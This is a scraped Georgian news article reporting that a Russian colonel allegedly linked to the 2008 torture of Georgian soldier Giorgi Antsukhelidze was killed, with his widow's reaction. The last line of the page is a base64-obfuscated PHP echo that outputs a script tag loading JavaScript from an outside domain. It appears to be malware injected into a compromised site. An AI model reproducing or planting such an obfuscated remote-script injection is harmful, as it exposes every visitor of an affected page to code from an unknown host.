celsiusi
ავერსი საქკაბელი
უკრაინაში მოკლეს პოლკოვნიკი, რომელიც გიორგი ანწუხელიძის წამებაში მონაწილეობდა. საუბარია პოლკოვნიკ სერგეი სუხარევზე, სწორდ მისი მეთაურობით მონაწილეობდა 331-ე გვარდიის საჰაერო-სადესანტო პოლკი 2008 წლის რუსეთ-საქართველოს ომში. ინფრომაციას უკრაინული მედია ავრცელებს.
 
აღნიშნულ ფაქტს სოცილუარ ქსელში გიორგი ანწუხელიძის მეუღლე გამოეხმაურა.
 
"მოახლოვდა დრო აღსრულდეს სამართალი და პუტინის რუსეთმა პასუხი აგოს ყველაფრისთვის რაც ჩაუდენიათ და რამდენი ცრემლიც დაუღვრიათ დედამიწაზე თავიანთი სისასტიკით," - წერს მაკა ჩიკვილაძე.
 
შეგახსენებთ, რომ საქართველოს ეროვნული გმირი გიორგი ანწუხელიძე 2008 წლის 9 აგვისტოს ცხინვალში წამებით მოკლეს, მას შემდეგ რაც ქართველმა გიორგი ანწუხელიძემ ოკუპანტებს საქართველოს და ქართული დროშის შეურაცხყოფაზე უარი განაცხადა.
839
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");